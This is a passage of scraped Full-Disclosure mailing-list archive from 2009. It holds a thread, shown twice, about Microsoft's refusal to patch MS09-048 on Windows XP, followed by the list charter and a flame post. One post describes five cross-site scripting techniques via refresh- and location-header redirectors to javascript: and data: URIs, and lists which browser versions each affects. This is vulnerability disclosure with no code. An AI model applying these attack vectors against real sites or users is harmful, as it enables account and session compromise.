here... :/ As Larry and Thor pointed out, what sux is that despite M$
PROMISING that they would continue supporting XP since they didn't exactly
state WHAT they would support, they seem to be legally free to actually get
away with this BS *sigh* gotta love insurance-salesman-tactics when it comes
to promises...
So... with all this commentary, in the end, I still didn't read from the
big'uns on whether or not a 3rd party open-source patch would be
released... I sure miss the days that people back in the day who cared would
:) In the end I realize, it sounds like a total over-haul of the TCP/IP
stack is required; but does it really have to? Really?
How effective is what Tom Grace suggests? Unless I'm misunderstanding, he's
suggesting switching to an iptables based protection along with a registry
tweak... ahh the good ol' batch firewall :) Would this actually work as a
viable work-around? I realize M$ stated this as such, but given their
current reputation it's really hard to take their word for anything these
days :P
What free/cheap client-level-IPS solutions block this current attack? Any
suggestions?
Thank you for your time and look forward to some more answers.
Sincerely,
Aras Russ Memisyazici
arasm {at) vt ^dot^ edu -- I set my return addy to /dev/null for... well
you know why!
Systems Administrator
Virginia Tech
-Original Message-
From: Larry Seltzer [mailto:la...@larryseltzer.com]
Sent: Wednesday, September 16, 2009 5:03 PM
To: Susan Bradley; Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?
Yes, they used the bulletin to soft-pedal the description, but at the
same time I think they send a message about XP users being on shaky
ground. Just because they've got 4+ years of Extended Support Period
left doesn't mean they're going to get first-class treatment.
Larry Seltzer
Contributing Editor, PC Magazine
larry_selt...@ziffdavis.com
http://blogs.pcmag.com/securitywatch/
-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Susan
Bradley
Sent: Wednesday, September 16, 2009 2:26 PM
To: Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
Subject: Re: [Full-disclosure] 3rd party patch for XP for MS09-048?
It's only default for people running XP standalone/consumer that are
not even in a home network settings.
That kinda slices and dices that default down to a VERY narrow sub sub
sub set of customer base.
(Bottom line, yes, the marketing team definitely got a hold of that
bulletin)
Thor (Hammer of God) wrote:
Yeah, I know what it is and what it's for ;) That was just my subtle
way of trying to make a point. To be more explicit:
1) If you are publishing a vulnerability for which there is no patch,
and for which you have no intention of making a patch for, don't tell me
it's mitigated by ancient, unusable default firewall settings, and don't
withhold explicit details. Say THERE WILL BE NO PATCH, EVER. HERE'S
EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK. Also, don't say
'you can deploy firewall settings via group policy to mitigate exposure'
when the firewall obviously must be accepting network connections to get
the settings in the first place. If all it takes is any listening
service, then you have issues. It's like telling me that the solution
is to take the letter 'f' out of the word solution.
2) Think things through. If you are going to try to boot sales of
Win7 to corporate customers by providing free XP VM technology and thus
play up how important XP is and how many companies still depend upon it
for business critical application compatibility, don't deploy that
technology in an other-than-default configuration that is subject to a
DoS exploit while downplaying the extent that the exploit may be
leveraged by saying that a typical default configuration mitigates it
while choosing not to ever patch it. Seems like simple logic points
to me.
t
-Original Message-
From:
Re: [Full-disclosure] 3rd party patch for XP for MS09-048?
:)
Thank you all for your valuable comments... Indeed I appreciated some of the
links/info extended (Susan, Thor and Tom) However, in the end, it sounded
like:
a) As a sysadmin in charge of maintaining XP systems along with a whole
shebang of other mix setups, unless I deploy a better firewall solution, I
seem to be SOL.
b) M$ is trying to boost Win7 sales... whoopd...@#$%#^-doo... As was stated
earlier, they did the exact same thing back in Win2K days... Nothing new
here... :/ As Larry and Thor pointed out, what sux is that despite M$
PROMISING that they would continue supporting XP since they didn't exactly
state WHAT they would support, they seem to be legally free to actually get
away with this BS *sigh* gotta love insurance-salesman-tactics when it comes
to promises...
So... with all this commentary, in the end, I still didn't read from the
big'uns on whether or not a 3rd party open-source patch would be
released... I sure miss the days that people back in the day who cared would
:) In the end I realize, it sounds like a total over-haul of the TCP/IP
stack is required; but does it really have to? Really?
How effective is what Tom Grace suggests? Unless I'm misunderstanding, he's
suggesting switching to an iptables based protection along with a registry
tweak... ahh the good ol' batch firewall :) Would this actually work as a
viable work-around? I realize M$ stated this as such, but given their
current reputation it's really hard to take their word for anything these
days :P
What free/cheap client-level-IPS solutions block this current attack? Any
suggestions?
Thank you for your time and look forward to some more answers.
Sincerely,
Aras Russ Memisyazici
arasm {at) vt ^dot^ edu -- I set my return addy to /dev/null for... well
you know why!
Systems Administrator
Virginia Tech
-Original Message-
From: Larry Seltzer [mailto:la...@larryseltzer.com]
Sent: Wednesday, September 16, 2009 5:03 PM
To: Susan Bradley; Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?
Yes, they used the bulletin to soft-pedal the description, but at the
same time I think they send a message about XP users being on shaky
ground. Just because they've got 4+ years of Extended Support Period
left doesn't mean they're going to get first-class treatment.
Larry Seltzer
Contributing Editor, PC Magazine
larry_selt...@ziffdavis.com
http://blogs.pcmag.com/securitywatch/
-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Susan
Bradley
Sent: Wednesday, September 16, 2009 2:26 PM
To: Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
Subject: Re: [Full-disclosure] 3rd party patch for XP for MS09-048?
It's only default for people running XP standalone/consumer that are
not even in a home network settings.
That kinda slices and dices that default down to a VERY narrow sub sub
sub set of customer base.
(Bottom line, yes, the marketing team definitely got a hold of that
bulletin)
Thor (Hammer of God) wrote:
Yeah, I know what it is and what it's for ;) That was just my subtle
way of trying to make a point. To be more explicit:
1) If you are publishing a vulnerability for which there is no patch,
and for which you have no intention of making a patch for, don't tell me
it's mitigated by ancient, unusable default firewall settings, and don't
withhold explicit details. Say THERE WILL BE NO PATCH, EVER. HERE'S
EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK. Also, don't say
'you can deploy firewall settings via group policy to mitigate exposure'
when the firewall obviously must be accepting network connections to get
the settings in the first place. If all it takes is any listening
service, then you have issues. It's like telling me that the solution
is to take the letter 'f' out of the word solution.
2) Think things through. If you are going to try to boot sales of
Win7 to corporate customers by providing free XP VM technology and thus
play up how important XP is and how many companies still depend upon it
for business critical application compatibility, don't deploy that
technology in an other-than-default configuration that is subject to a
DoS exploit while downplaying the extent that the exploit may be
leveraged by saying that a typical default configuration mitigates it
while choosing not to ever patch it.Seems like simple logic points
to me.
t
-Original Message-
From: Susan Bradley [mailto:sbrad...@pacbell.net]
Sent: Wednesday, September 16, 2009 10:16 AM
To: Thor (Hammer of God)
Cc: bugt...@securityfocus.com; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] 3rd party patch for XP for MS09-048?
It's XP. Running in RDP mode. It's got IE6, and wants antivirus.
Of
course it's vulnerable to any and all gobs of stuff out there. But
[Full-disclosure] Cross-Site Scripting attacks via redirectors in different browsers
Hello Full-Disclosure! I already sent this letter to Bugtraq at 6th of September, but they declined to post it without any explanation - maybe it was due to some politic reasons :-). Will see how it'll be with your list. At the end of July I published my article Cross-Site Scripting attacks via redirectors (http://websecurity.com.ua/3376/). And at 4th of August I published English version of my article (http://websecurity.com.ua/3386/). In this article I wrote about using of redirectors in different browsers for conducting of Cross-Site Scripting attacks. In the article I wrote about XSS attacks in location-header and refresh-header redirectors in different browsers: Mozilla 1.7.x, Mozilla Firefox 3.x, Internet Explorer (IE6), Opera 9.x and Google Chrome 1.x. And after additional research in August I found that next browsers are also vulnerable: Google Chrome 2.x and 3.x, QtWeb, Safari, Opera 10.00 Beta 3, SeaMonkey, Firefox 3.6 a1 pre, Firefox 3.7 a1 pre, Orca Browser and Maxthon 3 Alpha. I wrote about five method of attacks in the article (via location-header and refresh-header redirectors) - about four of them I already posted in Bugtraq. In this letter I'll inform you about new vulnerable browsers to those vulnerabilities which I wrote to Bugtraq before. So in my article Cross-Site Scripting attacks via redirectors (http://websecurity.com.ua/3386/) I wrote about five attack vectors: Attack #1 - via refresh-header redirector to javascript: URI (http://www.securityfocus.com/archive/1/504718). Attack #2 - via refresh-header redirector to data: URI (http://www.securityfocus.com/archive/1/504972/30/300/threaded). Attack #3 - via location-header redirector to data: URI (http://www.securityfocus.com/archive/1/505479/30/270/threaded). Attack #4 - via location-header redirector (which use answer 302 Object moved) to javascript: URI (http://www.securityfocus.com/archive/1/506163) Attack #5 - via location-header redirector (which uses any 301 and 302 answers) to javascript: URI. After first release of the article, I found new vulnerable browsers with help of Aung Khant from YEHG Team. The next browsers are also vulnerable: Mozilla Firefox 3.0.13 - vulnerable to attacks #2,3,4. Google Chrome 2.0.172.28, 2.0.172.37 and 3.0.193.2 Beta - vulnerable to attacks #1,2. QtWeb 3.0 Build 001 and 3.0 Build 003 - vulnerable to attacks #1,2,3. Safari 4.0.3 - vulnerable to attacks #1,2. Opera 10.00 Beta 3 Build 1699 - vulnerable to attacks #1,3. SeaMonkey 1.1.17 - vulnerable to attacks #1,2,4. Firefox 3.6 a1 pre - vulnerable to attacks #1,2,3,4. Firefox 3.7 a1 pre - vulnerable to attacks #2,3,4. Orca Browser 1.2 build 5 - vulnerable to attacks #2,3,4. Maxthon 3 Alpha (3.0.0.145) with Ultramode (Apple’s WebKit emulation) - vulnerable to attacks #1,2. And also vulnerable to attacks #3,4,5 as Strictly social XSS. Maxthon 3 Alpha is only browser vulnerable to attack #5 (for now). Attack #5 is similar to attack #4, just works in all location-header redirectors. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] List Charter
[Full-Disclosure] Mailing List Charter John Cartwright jo...@grok.org.uk - Introduction Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-requ...@lists.grok.org.uk, send the word 'help' in either the message subject or body for details. - Moderation Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclos...@lists.grok.org.uk. Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a concensus has been reached. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Andrew Auerenheimer aka weev gets tree'd
WTF is up with this mailing list? I signed up a few weeks ago expecting full disclosure of security exploits or at least good security discussion. Instead what I got was full disclosure of how idiotic skr1p7 k1dd13z can be. BMF Im sorry, all I read there was WHINE WHINE FUCKIN WHINE. -- ciao JT ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
